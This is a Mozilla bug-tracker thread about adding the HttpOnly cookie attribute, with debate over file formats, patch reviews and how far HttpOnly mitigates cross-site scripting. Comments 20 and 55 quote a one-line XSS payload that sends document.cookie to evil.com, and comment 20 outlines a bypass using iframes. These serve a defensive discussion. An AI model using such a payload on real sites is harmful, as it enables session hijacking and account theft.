Closed
Bug 178993
Opened 22 years ago
Closed 18 years ago
MSIE-extension: HttpOnly cookie attribute for cross-site scripting vulnerability prevention
Categories
(Core :: Networking: Cookies, enhancement)
Core
Networking: Cookies
Tracking
()
RESOLVED
FIXED
mozilla1.9alpha1
People
(Reporter: jpranevich, Assigned: avva)
References
()
Details
(Keywords: dev-doc-complete, fixed1.8.0.15, fixed1.8.1.5, Whiteboard: [sg:want] Comments 20-24 and 47 discuss how much this would help security in the face of a smart attacker)
Attachments
(6 files, 8 obsolete files)
(deleted),
patch
|
benjamin
:
review+
dveditz
:
review+
|
Details | Diff | Splinter Review |
(deleted),
patch
|
mvl
:
review+
mkaply
:
superreview+
dveditz
:
approval1.8.1.4-
|
Details | Diff | Splinter Review |
(deleted),
patch
|
sayrer
:
review+
|
Details | Diff | Splinter Review |
(deleted),
patch
|
Details | Diff | Splinter Review | |
(deleted),
patch
|
mvl
:
review+
darin.moz
:
superreview+
dveditz
:
approval1.8.1.5+
asac
:
approval1.8.0.next+
|
Details | Diff | Splinter Review |
(deleted),
patch
|
dwitte
:
review+
caillon
:
approval1.8.0.next+
|
Details | Diff | Splinter Review |
I feel very dirty, but it has some merit:
Internet Explorer 6.x has implemented an extension to the SetCookie HTTP header
which would mark a cookie as being readable only by the server and never by
scripting components of the client. This would make many types of cross-site
scripting vulnerabilities more difficult as "malicious" embedded code would be
unable to access sensitive cookies that the web server would not wish them to
have access to. (Imagine a hosting environment, like bugzilla, where you might
have authentication data stored in a cookie. If someone could inject bad JS into
the page-- possibly because there isn't enough tag stripping or something-- they
could act on those cookies, possibly by providing them to a third party which
might be able to use the information as a sort of simple identity theft. This is
a simplified example, but real-world cases exist.)
Of course, this is a purely client side restriction and, as such, has many
limitations anyway.
Excerpted from
http://msdn.microsoft.com/library/en-us/dncode/html/secure10102002.asp
The Microsoft Internet Explorer team came up with the idea of marking cookies as
scriptless. Think about what cookies are for a moment. They are opaque blobs
understood by the server, and not the client, and normally they should not be
accessed by client code. Most XSS attacks, but not all, involve cookie data
disclosure, and if a server could mark a cookie indicating that it should never
be accessed by the client, and have the client browser enforce this policy, it
would help mitigate the issue. Note, this does not mean you can continue to
write sloppy XSS-ridden code. Think of this cookie option as a small insurance
policy that helps reduce information disclosure threats and nothing more.
If Internet Explorer 6.0 SP1 (available in Microsoft Windows® XP SP1 and at the
Windows Update Site) detects a cookie marked HttpOnly and some client side
script code, such as JavaScript, attempts to read the cookie (document.cookie,
for example), Internet Explorer returns an empty string, thus preventing the
attack by preventing the malicious code in the XSS attack from sending the data
back to a malicious site. Of course, the cookie is passed to and from the
originating server as normal; the browser using script code just can't read it.
A cookie is set on the client with an HTTP response header. The following shows
the syntax used in this header:
Set-Cookie: <name>=<value>[; <name>=<value>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]
Note, the HttpOnly attribute is not case sensitive.
Comment 1•22 years ago
|
||
could be a nice enhancement
No need for the RFE since this is already marked as a Enhancement
Summary: [RFE] MSIE-extension: HttpOnly cookie attribute for cross-site scripting vulnerability prevention → MSIE-extension: HttpOnly cookie attribute for cross-site scripting vulnerability prevention
Comment 3•21 years ago
|
||
hmm... it looks like nsICookieService::[gs]etCookieStringFromHttp are only
called by the HTTP code, so we can use that to fix this bug (i.e., no API
changes required). we should probably make this would be a built-in (default)
policy instead of pushing the logic into the nsICookiePermission implementation.
dwitte: does this sound right to you?
Assignee | ||
Comment 4•21 years ago
|
||
A few notes on this patch:
- against trunk, tested and appears to work fine
- the format of cookies.txt is extended (unavoidable, unfortunately, if the
HttpOnly status is to be preserved between sessions), but
nsCookieService::Read() continues to accept standard-style cookies.txt as well
- the new HttpOnly attribute of cookies is exported via nsICookie2 interface
(not the frozen nsICookie)
- APIs in nsCookieService aren't changed. The workhorse of finding/returning
cookies was GetCookieStringFromHttp and GetCookieString was calling it. Outside
cookie code, however, the only user of GetCookieStringFromHttp is the HTTP code
in netwerl/protocol/http/src/nsHttpChannel.cpp , and XSS/plugins/etc. all use
GetCookieString. So, to give the primary cookie-finding code the knowledge of
whether the cookie is requested by HTTP code or not, while avoiding changing
the exported APIs, the workhorse is now a new protected member
GetCookieStringInternal() (with an additional parameter specifying whether
HttpOnly cookies are to be returned) and both GetCookieString and
GetCookieStringFromHttp are thin wrappers around it.
I'm rather new to Mozilla code and will be grateful for any criticism or
reviews.
Comment 5•21 years ago
|
||
Comment on attachment 138799 [details] [diff] [review]
First attempt at fixing this bug; reviews would be appreciated
nice patch! it pretty much looks fine to me, sans a few nits.
>+ // if what we have at httpOnlyIndex is TRUE or FALSE, this is a
>+ // HttpOnly field, otherwise it's the expiration field.
>+ isHttpOnly = PR_FALSE;
>+ expiresIndex = nextIndex;
>+ if (Substring(buffer, httpOnlyIndex, nextIndex - httpOnlyIndex - 1).Equals(kTrue))
>+ isHttpOnly = PR_TRUE;
>+ else if (Substring(buffer, httpOnlyIndex, nextIndex - httpOnlyIndex - 1).Equals(kFalse))
>+ isHttpOnly = PR_FALSE;
>+ else expiresIndex = httpOnlyIndex;
put the |else| on its own line?
>+// helper function for GetCookieStringInternal
>+static inline PRBool ispathdelimiter(char c) { return c == '/' || c == '?' || c == '#' || c == ';'; }
>+
>+
ubernit, you've got one extra newline here.
>+NS_IMETHODIMP
you want |nsresult| here, not NS_IMETHODIMP... internal methods don't need to
be virtual.
>+nsCookieService::GetCookieStringInternal(nsIURI *aHostURI,
>+ nsIURI *aFirstURI,
>+ nsIChannel *aChannel,
>+ PRBool isHttpBound,
the convention is to prefix method parameters with |a|, so call this
|aIsHttpBound|?
>Index: cookie/src/nsCookieService.h
>===================================================================
>+ NS_IMETHODIMP GetCookieStringInternal(nsIURI *aHostURI, nsIURI *aFirstURI, nsIChannel *aChannel, PRBool isHttpBound, char **aCookie);
... and you want |nsresult| here too of course. (note that if you did actually
want it to be a virtual xpcom-ified method, you would use NS_IMETHOD to declare
the prototype in the .h file... not NS_IMETHODIMP. the latter is used in the
.cpp when you actually implement it.)
now of course, this patch will destroy backward compatibility of cookie files,
so if a user goes from 1.7 back to an older version, the older version will
just clobber their cookie file. i'll give r= on this patch, but i think we
should hold off on landing it until we get a cookie file versioning system
similar to what mvl's doing in permissionland. i'm on holiday until the 19th
though, so if someone wants to do this all for 1.7a, be my guest ;)
Attachment #138799 -
Flags: review+
Has anybody considered not changing the cookies.txt file at all and instead
maintain a parallel file with additional cookie attributes? (and that file
could be upwards-compatible and versioned, etc, unlike the current cookies.txt
which is pretty much impossible to change)
That way you don't break wget/curl/old Mozillas and whatever else might parse
cookies.txt.
The only security risk is that http-only cookies received with new mozilla could
be used insecurely (exposed to client side scripts) by old mozilla. But current
mozilla is already "insecure" in that manner, so I don't feel that's something
to be concerned about.
Comment 8•21 years ago
|
||
Comment on attachment 138799 [details] [diff] [review]
First attempt at fixing this bug; reviews would be appreciated
>- * host \t isDomain \t path \t secure \t expires \t name \t cookie
>+ * host \t isDomain \t path \t secure \t httponly \t expires \t name \t cookie
I don't like that change of fileformat. It will cause problems when you use an
older version of mozilla with the new file. httponly becomes expires. I think
all you cookies will be lost. No good.
(It really will cause trouble. Been there, seen it).
So either we need to do something clever with the current format (obfuscate it
in some other field) or get a new file, like cookies2.txt. If we do that,
consider other changes too, like a extra field to store last use date of a
cookie, for better expiring when you have > 300 cookies. dwitte had some ideas
about it.
Comment 9•21 years ago
|
||
yep pretty much my thoughts exactly :)
so if someone wants to do said versioning and improvements for 1.7a, be my
guest, else this patch will have to wait for 1.8 when i get back from holiday.
Assignee | ||
Comment 10•21 years ago
|
||
I'll gladly do whatever's necessary, if we can agree on what is to be done.
Currently the best idea seems to be:
- maintain a file in a new format, cookies2.txt
- leave cookies.txt in the current format
- on read, check for cookies2.txt, if it's not there, read from cookies.txt
(alternatively, compare timestampts if both are present? not sure which is best)
- on write, update both files (could this be a perf concern if the number of
cookies is large?)
- in the file itself, maintain two additional fields: boolean HttpOnly and a
timestamp of when the cookie was last used.
- have some versioning information in the file (stored how?)
If all these question marks can be resolved, I can update my patch to do this.
Comment 11•21 years ago
|
||
Losing all cookies is a bad thing. Missing some new or changed cookies when you
go back to an old version is not that bad. So comparing timestamps isn't needed
i think. Just read cookies2.txt if it is there.
For the same reason, i don't think writing cookies.txt is needed. We aren't
writing cookie2.txt either in old versions :)
If you do want it, it is acceptable to only do it when closing mozilla. In the
event of a crash, nothing is lost. Just start mozilla and close it, and
cookies.txt is up-to-date.
The 2 in cookies2.txt is a good versioning system :)
Before you make a new fileformat, talk to dwitte about other changes that need
to be made. I know about last-used date, but there might be more.
On the fileformat itself: It would be good if a file is extendable. You don't
want to go throught the same mess again in a few months just because some other
field needs to be added. But is is hard to do, because the file is read, then
the data is in memory, and then written out again. unknown data is discarded.
The storage in memory is quite efficent, so you can't just store all data you
can't parse.
So, find something clever (and tell me, for permissions), or make really sure
there isn't a need for an update in a loooong time. (maybe 2 unused boolean
fields? or a 0-255 int? there is some room in the bitfields)
Comment 12•21 years ago
|
||
well, this is 1.8a material, so i'll try to think about this more when i return
in a week.
i don't like the idea of a separate file with just the additional flags, but
depending on the importance of cookies.txt being world-parseable it might just
be the best way to go :/
Updated•21 years ago
|
Target Milestone: Future → mozilla1.8alpha
Comment 13•21 years ago
|
||
I'd like to suggest (as a lurker on this ticket)
1) make an extensible new cookie file format
2) maintain this new file and the old, fixed format cookies.txt file for some
time (newer Mozilla re-write cookies.txt as a derivative of cookies2.txt)
3) announce that the old fixed format cookies.txt file is deprecated (encourage
wget/curl/etc. to begin supporting the new format)
I like the idea that newer Mozilla would only read the newer cookie2 file at
startup: cookies.txt would only be maintained as a derivative of cookies2.txt
for other apps that expect the old format.
For (1), XML would seem an obvious choice. This might even be the easiest option
to program in Mozilla, given the existing XML support. Another option might be a
format of one cookie per line, with tab-delimited name="value" pairs, where the
values are HTML escaped, e.g.
domain=".mozilla.org" secure="0" path="/" name="msg" value=""hi""
httponly="0" lastused="1074027797" usercomment="accepted because i trust them"
expires="1124027797"
As for loading unknown/unsuppported attributes in memory: yes, that seems bad.
Solution: don't. When Mozilla closes, it can re-read cookies2.txt
(cookies2.xml?) and do a sort of "merge" of what it finds there (the old cookie
info) with what's in memory (the new cookie info): adding, modifying, or
deleting cookies' information as it goes.
A caveat for the extensible format: if Mozilla were to use some extensible
format, that would raise the possibility of two different versions of Mozilla
using cookie attributes unknown to each other. In such a case, having Mozilla
decide whether to preserve attributes it does not understand is problematic.
E.G.:
- Mozilla A might record whether the cookie was set by http or set by
client-side scripting ("setbyhttp") and how many times the cookie has been sent
("usecounter") while
- Mozilla B records the URL that set the cookie ("setterurl").
- Let's say both Mozilla A and Mozilla B support the "lastused" attribute.
Let's say a user accepts a cookie with Mozilla A, browses, then shuts down
Mozilla A. At this point, cookies2.txt has the setbyhttp="1" attribute recorded.
Now the user starts up Mozilla B and revisits the site. If nothing else about
the cookie changed, then Mozilla B, when it closes, should definitely write
information about all the attributes of the cookie that it supports, including
the new lastused attribute. Mozilla B cannot write a setterurl attribute, as it
doesn't know what URL set the cookie; it could record that attribute as empty,
or leave it out: either would be fine. But what should it do about the
"setbyhttp" and "usecounter" attributes that it does not understand? In my
name/value non-XML storage example above, Mozilla B would have no way of knowing
that "setbyhttp" is a attribute that only changes when the cookie is set (and
should be preserved) while "usecounter" is intended be updated with use (and,
since Mozilla B does not do so, arguably should be discarded when Mozilla B
re-writes cookies2.txt). With XML there I see at least a couple approaches to
tackling this problem. Simplest would be XML that Mozilla B would write like this:
<cookie>
<cookie-attr name="domain" value=".mozilla.org"/>
<cookie-attr name="name" value="msg"/>
<cookie-attr name="value" value=""hi""/>
<cookie-attr name="lastused" value="1074027797"/>
<cookie-attr name="setbyhttp" value="1" preserved="1"/>
<cookie-attr name="usecounter" value="8365" preserved="1"/>
...
</cookie>
where the "preserved" atttribute of the "setbyhttp" and "usecounter" cookie-attr
elements would indicate that the version of Mozilla that wrote this XML had no
idea what those attributes meant. When Mozilla A ran again, it could decide
whether to accept the "perserved" attributes or discard them. A non-XML file
format could have something similar to the "perserved" marker attribute, of
course; it's just more difficult to design an extensible file that way.
XML or not, moving to an extensible cookie serialization file format means
giving Mozilla more than just support for this HttpOnly extension -- it also
means making other features like the last use date that mvl mentioned in
http://bugzilla.mozilla.org/show_bug.cgi?id=178993#c8
Comment 14•21 years ago
|
||
the whole point is the merging. It can only be done by giving each cookie some
long, random, unique id. And merging would be a performance problem.
The code would be huge and likely ugly too.
Using xml is a problem, because afaik necko (when cookies live) don't depend on
the xml parser, and making it just for this is bad.
Anyway, i strongly suggest creating a new bug for the fileformat changes, make
this depend on it, to keep this bug for discussing the httponly thing.
Comment 15•21 years ago
|
||
Opening a new ticket & marking this as dependent on it sounds good to me.
Here's a quick suggestion for mimicing the "preserved" flag in a non-XML file:
domain=".mozilla.org" name="msg" ... ?setbyhttp="1" ?usecounter="8365"
Field names would be alphanumeric, and a "?" preceding a field name would
indicate that the Mozilla process writing the file had no idea what the value meant.
Comment 16•21 years ago
|
||
Filed as bug 230933. This bug is from now on only for httponly.
Updated•21 years ago
|
QA Contact: tever → cookieqa
Comment 17•20 years ago
|
||
Security should be a priority over a clean implementation. If there is a quick
hack that would enable this to be implemented, the dependancy on bug 230933
should be removed to let this move forward.
Comment 19•20 years ago
|
||
Comment on attachment 138799 [details] [diff] [review]
First attempt at fixing this bug; reviews would be appreciated
no, it's not. i'm retracting my review on this due to subsequent discussion
(see comment 8) - we need a new fileformat to implement this. that's why this
bug is dependent on bug 230933.
whether we implement the new fileformat as a separate file that extends
cookies.txt, or as a replacement file, i'm undecided on. i'd prefer the latter
for cleanliness, but this discussion should take place in bug 230933.
Attachment #138799 -
Flags: review+ → review-
Comment 20•20 years ago
|
||
HttpOnly does not fix the hole some people claim it fixes. Let's look at an
attack scenario that HttpOnly might appear to fix:
1. Attacker uses XSS or a same-origin hole to inject the following:
location = "http://evil.com/" + escape(document.cookie);
2. Attacker uses cookie to log into the site as you and send himself your money.
Here's how the attacker can get around HttpOnly:
1. Attacker uses XSS or a same-origin hole to inject a complicated script.
2. Complicated script opens an iframe to another page on the same site and uses
DOM to cause you to send money to the attacker.
HttpOnly is only useful when the cookie itself contains sensitive information
that does not appear on the site when you are logged in. An example is Slashdot
several years ago, which stored your password in a cookie. With your password,
an attacker can *change* your password; without your password, an attacker can
only masquerade as you as long as you leave the security hole open.
Comment 21•20 years ago
|
||
Indeed, HTTPOnly does not stop complex targetted attacks like you mention, but
that shouldn't be an excuse to leave low hanging fruit. You are overlooking that
on any site that tracks the users session with cookies, the cookie itself does
sensitive information. This is the majority of sites now, including Bugzilla.
Hijacking a Bugzilla session is trivial. A user could upload a legitimate
looking html attachment to a bug that sends the session data to the hacker then
wait to get an admin's session. The only protection Bugzilla offeres is that it
optionally tie's the session to ip address, but that wont work for users whose
ip changes between requests (AOL, corp proxies, etc).
HTTPOnly's value is that it makes session hijacking theorhetically nearly
impossible. If you haven't, I suggest reading the Bugtraq thread after eEye's
attempt to hack it when it first came out in IE.
Comment 22•20 years ago
|
||
(In reply to comment #21)
> Indeed, HTTPOnly does not stop complex targetted attacks like you mention, but
> that shouldn't be an excuse to leave low hanging fruit.
There's no point in blocking simple automated attacks unless we can also block
complex automated attacks. The only thing it would accomplish is to give users
and web site owners a false sense of security.
> You are overlooking that
> on any site that tracks the users session with cookies, the cookie itself does
> sensitive information. This is the majority of sites now, including Bugzilla.
My Bugzilla cookie includes a login cookie and some prefs. The login cookie is
no more useful than the ability to control my browser at this domain. The prefs
can be inferred by loading a bug list and using the DOM. Thus, HttpOnly would
not keep any "sensitive information" from an attacker.
> Hijacking a Bugzilla session is trivial. A user could upload a legitimate
> looking html attachment to a bug that sends the session data to the hacker
> then wait to get an admin's session.
That's bug 38862. And it's irrelevant, because Bugzilla would be no less
vulnerable with HttpOnly.
> HTTPOnly's value is that it makes session hijacking theorhetically nearly
> impossible. If you haven't, I suggest reading the Bugtraq thread after eEye's
> attempt to hack it when it first came out in IE.
What do you mean by "theorhetically nearly impossible"? Did they argue that my
exploit wouldn't work? URL?
Comment 23•20 years ago
|
||
> 2. Complicated script opens an iframe to another page on the same site and uses
> DOM to cause you to send money to the attacker.
Doesn't this make the assumption that the attacker has intimate knowledge of the
DOM of the page they are are trying to manipulate through the script? For
example if I'd never seen the bugzilla admin screen, I couldn't write a script
to manipulate it through a XSS vulnerability. I realize I'm asking for
security through obsecurity, but when that's the best you can do...
If there are several applications which share a login cookie, if the attacker
finds a XSS he can use against you in one application but he knows nothing about
how the other applications function then he can't write a script to manipulate
them, but if he can steal my login cookie he can rummage through them from his
own browser as long as session doesn't expire. I believe this alone makes this
bug worth fixing.
Comment 24•20 years ago
|
||
(In reply to comment #22)
> (In reply to comment #21)
> There's no point in blocking simple automated attacks unless we can also block
> complex automated attacks.
Until there is a universal javascript security spec, or browsers stop executing
anonymous javascript by default, the web will be fundamentally insecure. It's
been like that since js was introduced.
> The only thing it would accomplish is to give users
> and web site owners a false sense of security.
I am not being facetious, but I believe anyone advertising a secure browser, and
installing that browser with javascript enabled gives users a false sense of
security in the first place. It's just not possible to be 100% secure in todays
browser model with javascript on. I don't know of any proposed solution that
would stop the "ultimate" xss attack that uses the victim's browser itself as a
proxy for the attacker though (i've got some ie/moz proof of concept js that
does this bitrotting on some corner of my hd).
I am not privy to the Mozilla threat assessment (if one exists formally), but I
would hope it includes xss cookie hijacking via javascript as a highly rated
threat to sensitive data. I am also not aware of any thing that Mozilla or
Firefox do by default to mitigate this threat other than turning off javascript
entirely. It is undeniable that adding the HTTPOnly mitigation would make
Firefox a more secure browser if mitigated exploits are the metric.
Would the added security be worth the dev time is something I can not judge, but
HTTPOnly does add real value.
Comment 25•20 years ago
|
||
why not simply disallow js access to document.cookie using caps?
Comment 26•20 years ago
|
||
timeless: we used to have a UI pref for that and it broke sites.
Comment 27•20 years ago
|
||
jesse: we really need caps to have a logging system which lets users easily
build caps whitelists on a site controlled basis.
something like:
site foo tried to use:
[ ] document.cookie
if foo isn't working for you, then it might be because of restrictions currently
in place, checking some of the item(s) above may allow the site to work better.
Comment 28•20 years ago
|
||
The difference between http-only and caps is that http-only is set by the server
and caps is by the client.
http-only can be used if the author of the site knows his site may be vulnareble
to cross site scripting. I wonder how many sites actually use it.... Shouldn't
they just fix their site?
Comment 29•20 years ago
|
||
If we want to make this happen without the hassle of changing the format of
cookies.txt, there are several hacks we could do within the current format.
Which of them works correctly depends on the cookies.txt parsing code that's out
there - ours, wget's and any other.
We only need to insert a single bit of information in each line, so we could
indicate HTTP only by:
- Using the presence of trailing whitespace
- Using a change of case in the boolean TRUE/FALSE values
- Using /./ at the top of the path instead of /.
- Having each line followed by a comment line (beginning #) with extra data on it.
These are all nasty, but perhaps better than getting into the hassle of changing
the cookies.txt file format.
Gerv
Comment 30•19 years ago
|
||
Any chance of this landing for 1.1?
Comment 31•19 years ago
|
||
Of what landing? The attached patch is 18 months old and questions have been
raised over the implementation. Do you have an up-to-date working patch with
those issues addressed? :-)
Gerv
Assignee: avva → darin
Comment 33•19 years ago
|
||
Applied the original patch manually to current trunk, with requested changes.
Extends the cookies.txt file format with an extensible \t delimited line:
#mxa \t HttpOnly [\t <additional attr]
Attributes set in an #mxa-prefixed line affect all cookies parsed afterwards.
Code that writes cookies.txt interleaves normal cookie lines with #mxa lines.
Updated•19 years ago
|
Attachment #186756 -
Flags: review?(dwitte)
Comment 34•19 years ago
|
||
My two quick concerns are:
- We only have one chance to extend the file format; are we certain we are doing
it in a way which allows further extensions later without breaking new parsing code?
- Would it make more sense to have a comment line per cookie? This "all
following cookies" feature makes future extensions much harder to write; what
happens if they apply to a different set of cookies?
I've pinged dwitte to try and get him to review.
Gerv
Comment 35•19 years ago
|
||
I'd like to review this, sorry for the delay. I should be able to get to it next
week.
Comment 36•19 years ago
|
||
The #mxa comment line is extensible. Additional \t seperated attributes can be
added onto the line without breaking the format. I've tried it with a few bits
of random data (not exhaustive, however), and it should be backwards and
forwards compatible, provided any additional attributes added in the future
honor the pattern.
Right now, it is one #mxa line per cookie. Having an #mxa line affect all
cookies following it is a side effect of how the patch is implemented. It would
be fairly trivial to add code to reset #mxa attributes to defaults after every
cookie line.
Comment 37•19 years ago
|
||
I don't see how the code preserves any atributes added to the #mxa line when the
cookie file is written. The aaded attributes were not stored in memory, and the
writing code does not try to recover them.
So if a mozilla with this patch reads a file from an even newer mozilla which
added extra info the the #mxa line, that info is lost. So as far as i can see
it, the format is not extensible.
Comment 38•19 years ago
|
||
True, if an older version of Mozilla reads/writes the cookies.txt file, any new
#mxa attributes will be lost.
Incentive to write cookies.xml?
Comment 39•19 years ago
|
||
> Incentive to write cookies.xml?
No. If we are moving away from cookies.txt, we should move to mozStorage.
Comment 40•19 years ago
|
||
mvl: really? The easy parseability of cookies.txt by 3rd-party programs is not
something we should throw away lightly.
How about this: we switch to a new format, but reflect the contents into
cookies.txt at shutdown - so it's a read-only mirror of the data. I don't know
of any 3rd party apps which _update_ cookies.txt.
Gerv
Comment 41•19 years ago
|
||
Six Apart: I don't think there's anything inherent in the comment format you
chose which prevents you from writing forwardly-compatible parsing code which
just ignores attributes it doesn't know about.
If we are going to move to mozStorage, mvl needs to tell us exactly what it is,
where it's documented, and how much work it would be. :-) Otherwise, I'd rather
have a slightly hacky implementation now than wait another few years.
Gerv
Comment 42•19 years ago
|
||
mozStorage is our wrapper around sqlite. It lives in
http://lxr.mozilla.org/seamonkey/source/storage/public/ (at least the interfaces
you need live there)
The files it produces are binary, but using the sqlite libraries, they can be
read without too much problems by other apps.
The advantage is that you can add columns to the table without breaking readers
that don't know about them. (at least, if those readers are somewhat sane)
Comment 43•19 years ago
|
||
Comment on attachment 186756 [details] [diff] [review]
updated patch, uses cookies.txt comment-line trick
sorry for the delay. while the patch is a nice idea, i'm giving r- on it in
favor of moving to mozIStorage. the issue of writing out #mxa lines not
understood by the current browser version is significant as well.
i've spoken to vlad and darin about the status of storage. it's ready for
consumers now, and the plan is to migrate over to it for the 1.9 timeframe. at
that point we'll deprecate cookies.txt, but probably continue to write it out
so that 3rd party apps remain happy.
once 1.1 is out i'll get a handle on moving cookies to storage.
Attachment #186756 -
Flags: review?(dwitte) → review-
Comment 44•19 years ago
|
||
one more thing - thanks for your efforts on this patch, Six Apart. if you're
interested in helping out with moving to storage, send me an email and i can try
to fill you in on what needs to be done.
further storage discussion will take place in bug 230933.
Comment 45•19 years ago
|
||
Okay, where should I start on implementing mozStorage for cookies?
Comment 46•19 years ago
|
||
> Okay, where should I start on implementing mozStorage for cookies?
You are great :-) A lesser man would have thrown up his hands in irritation. I
suggest you send Dan Witte an email.
Dan: both with cookies and bookmarks, I think we need to continue to make the
legacy file a read-only version of the mozIStorage store. Having both
human-readable is very useful.
Gerv
Updated•19 years ago
|
Whiteboard: [sg:want?] Comments 20-24 discuss how much this would help security in the face of a smart attacker
Updated•19 years ago
|
Whiteboard: [sg:want?] Comments 20-24 discuss how much this would help security in the face of a smart attacker → [sg:want] Comments 20-24 discuss how much this would help security in the face of a smart attacker
Comment 47•19 years ago
|
||
I was partly wrong in comment 20. HttpOnly does actually prevent attacks in certain cases due to differences between cookie domains and same-origin policy domains. In particular, it prevents attacks when all of the following conditions are met:
1. The pages with potentially malicious scripts are loaded from a subdomain, such as http://jesserud.livejournal.com/.
2. There are XSS holes, or the site has decided to allow scripts.
3. Login cookies are set to apply to subdomains (e.g. ".livejournal.com").
4. The use of the cookie on pages within the subdomain (including forms that submit to the main domain) is carefully restricted.
With HttpOnly, a malicious script loaded from my blog would still be able to cause you to post comments my blog (impersonating you), but would not be able to change your account password, see private posts on your friend's blog, or post entries in your own blog. This might be the reasoning behind LiveJournal's recent decision to move each blog to its own subdomain (http://news.livejournal.com/90556.html).
Whiteboard: [sg:want] Comments 20-24 discuss how much this would help security in the face of a smart attacker → [sg:want] Comments 20-24 and 47 discuss how much this would help security in the face of a smart attacker
Comment 48•19 years ago
|
||
LiveJournal may be changing its cookies to avoid relying on HttpOnly:
http://www.davidpashley.com/cgi/pyblosxom.cgi/computing/livejournal-mozilla-bug.html
Comment 49•19 years ago
|
||
Hi, this is Brad from LiveJournal.
See bug 324253 comment 18. I know HttpOnly cookies aren't a complete solution to all XSS problems, but they're incredibly helpful in mitigating attacks when XSS attacks do come up.
As LiveJournal has continually updated its HTML cleaner over the past 3-4 years, it's ironically Internet Explorer users who have had the least account break-ins because their cookies haven't been stolen, while Safari/Mozilla have been vulnerable. Yes, it's kinda our fault for not having a perfect cleaner, but even a white-listing cleaner can't be perfect when new browser features are added all the time. It's a constant battle for us.
We've noticed HttpOnly's effectiveness for so long that we were the ones who sponsored Anatoly to add HttpOnly cookies in comment 4, over 2 years ago now.
While we could discuss forever that HttpOnly isn't a complete solution for all attack instances, that's not what matters. It's like saying, "Well, condoms don't _always_ work, so let's just not use anything!" HttpOnly does work most of the time, especially for stopping what our HTML/CSS spermicide doesn't.
Comment 50•19 years ago
|
||
You guys really need to add HttpOnly , you are really leaving us web developers out in the cold.
Please add it ASAP.
Comment 51•19 years ago
|
||
I just have found some info about HttpOnly, and I'm impresionated, it's very strange you still don't manage to implemented this so useful feature..
It seem to me so very very useful to prevent password steals through XSS.
It's bad what my favorite browser still don't support that.
We (users&web developers) need this a lot.
This would stop I think 90% of password steals using XSS !
Javascript/others client side stuff realy shouldn't have acces to sensitive cookies.
Comment 52•18 years ago
|
||
WebDevs: One solution to this problem (lack of support for un-scriptable cookies) is to prepend a javascript-let to all your page responses which might potentially have user input being sent back to the client.
A simple example is below; note that for any private cookies which your server is sending with the HttpOnly flag (such as login-session or other token cookies), you should replace 'FOO' with the name of that cookie. The method of prepending the script to your page responses is an exercise to the reader and depends on your scipting language du-jour.
if (document.cookie.indexOf('FOO=')!=-1){
var warningMsg = 'Your Web Browser does not support \'HttpOnly cookies\', so viewing this page or filling in forms on this page may be a HIGH risk to your privacy and/or any login credentials. Please use an updated version of your browser, or try another browser if an update does not correct this. \n\nIf you logged-in to this site, for maximum security you should log out IMMEDIATELY';
alert(warningMsg);
history.go(-1);
window.close();
document.write('<!--');
};
The last 3 instructions in the above function may NOT work with all browsers and page loading scenarios ('top' windows, etc) and are only a best effort to keep the rest of the page from executing. The last instruction in particular would be very easy for a XXS attack to counter, for example.
Regarding this RFE's earlier delays due to concerns about changing the cookies.txt format; why not just store the 'metadata' fields (i.e HttpOnly) in another file and join them using hashtable keys? This would be (I believe) completely innocuous to the older browsers (except for their disregard for the HttpOnly flag)
Comment 53•18 years ago
|
||
> Please use an updated version of your
> browser, or try another browser if an update does not correct this.
That's entirely unreasonable, given that your login credentials are only at risk if the site owner has messed up their site security and unsafe content filtering.
While the browser manufacturers can and should do what they can to help with this problem, at the end of the day the security of a site is the responsibility of the site owner alone.
Gerv
Comment 54•18 years ago
|
||
> That's entirely unreasonable, given that your login credentials are only at
> risk if the site owner has messed up their site security and unsafe content
> filtering.
Gerv, at the risk of repeating what you/we know (and to to emphasize that logins and ID theft ARE at risk, though this RFE only partially addresses the problem)
1) 'Session fixation' / 'session hijacking' are (as we know) means wherein if a person is able to post javascript-able code to your site, they can 'steal' your login/session cookies, and masquerade as you on certain sites, then access your private data and even change your credentials. This includes but is not limited to webmail, bank sites, and many others... especially those sites which MUST allow users to upload (or attach) files.
2) site owners frequently MUST delegate portions of site development to less experienced (or under-pressure to deliver) developers, even a best effort to audit for holes in a large project can NEVER be fully trusted, because;
3) XSS thwarting is NOT limited to encoding user input -- some sites REQUIRE that the user can upload files, or html content (webmail) from 3rd parties. These are not trivial to sanitize, and traditional HTML/JS/URL encoding cannot be used.
4) When file uploads are required, there are way too many attack vectors (ha.ckers.org/xss.html lists a SMALL subset of them)... even the most experienced developers cannot be expected to mitigate them all.
5) No mitigation strategy -- or API -- (that I have found) has been published or otherwise endorsed by CERT, etc, to sanitize file uploads or webmail, for example. No public litmus test exists, either (to my knowledge)
6) Currently few or no server APIs enforce HTML/Javascript meta conversion response-methods.
7) Server APIs which tie the session cookie to IP address or agent-string are few, and have limited effectiveness (NATs, proxies)
Cookie theft is the most widely used threat since it is the easiest to accomplish and defeats SSL and obviates UI spoofing techniques altogether, and because the hole -- and intrusion -- are VERY difficult to detect. And fundamentally because so many sites bind the login to the session. But I agree that XSS UI spoofing (iframes) and form theft would NOT be addressed by this ('HttpOnly' cookie) RFE...
But some or all of these problems can ONLY be fully/safely addressed by the browser (NOT by the site). For example if a new <httponly> or <scriptoff> block could be wrapped around a file upload that a viewer views, and disable any scripts (embedded or SRC) inside of that block. That would be much, much easier and more bullet proof than the site trying to sanitize all attack vectors on file uploads or webmail. That would be the subject of a separate RFE though.
Comment 55•18 years ago
|
||
HttpOnly feels like a fairly clumsy Web 1.0 solution. I don't object to it being added, but I think a better solution in the long term would be to implement something like the following:
1) No-Cookies-Allowed header (for entirely foreign pages, like uploads)
2) security="sandbox" attribute for all elements.
Example for (2):
<div security="sandbox">
<script>
/// This won't work, nor will any other XSS silliness if 'sandbox' is strict enough...
location = "http://evil.com/"+escape(document.cookie);
</script>
</div>
Indeed, 'security' could have values as simple as 'noscript'.
Apologies if I've missed the point (as is entirely possible :) ).
Comment 56•18 years ago
|
||
Why firefox does not have any security in cookies?
While this discussion if drags since 2002 the fact is that millions of people continue vulnerable.
Please make anything about that, what it cannot continue is this insecurity of any bug of XSS in a site the user to lose all its information of cookie because firefox does not think about them.
Regards,
Firefox User who stolen informations in an error of XSS for firefox not to have no security in cookies.
Comment 57•18 years ago
|
||
> 2) security="sandbox" attribute for all elements.
This idea has been proposed many times. It's not really feasible for parts of a page, only for the whole page - when it reduces to Content Restrictions:
http://www.gerv.net/security/content-restrictions/
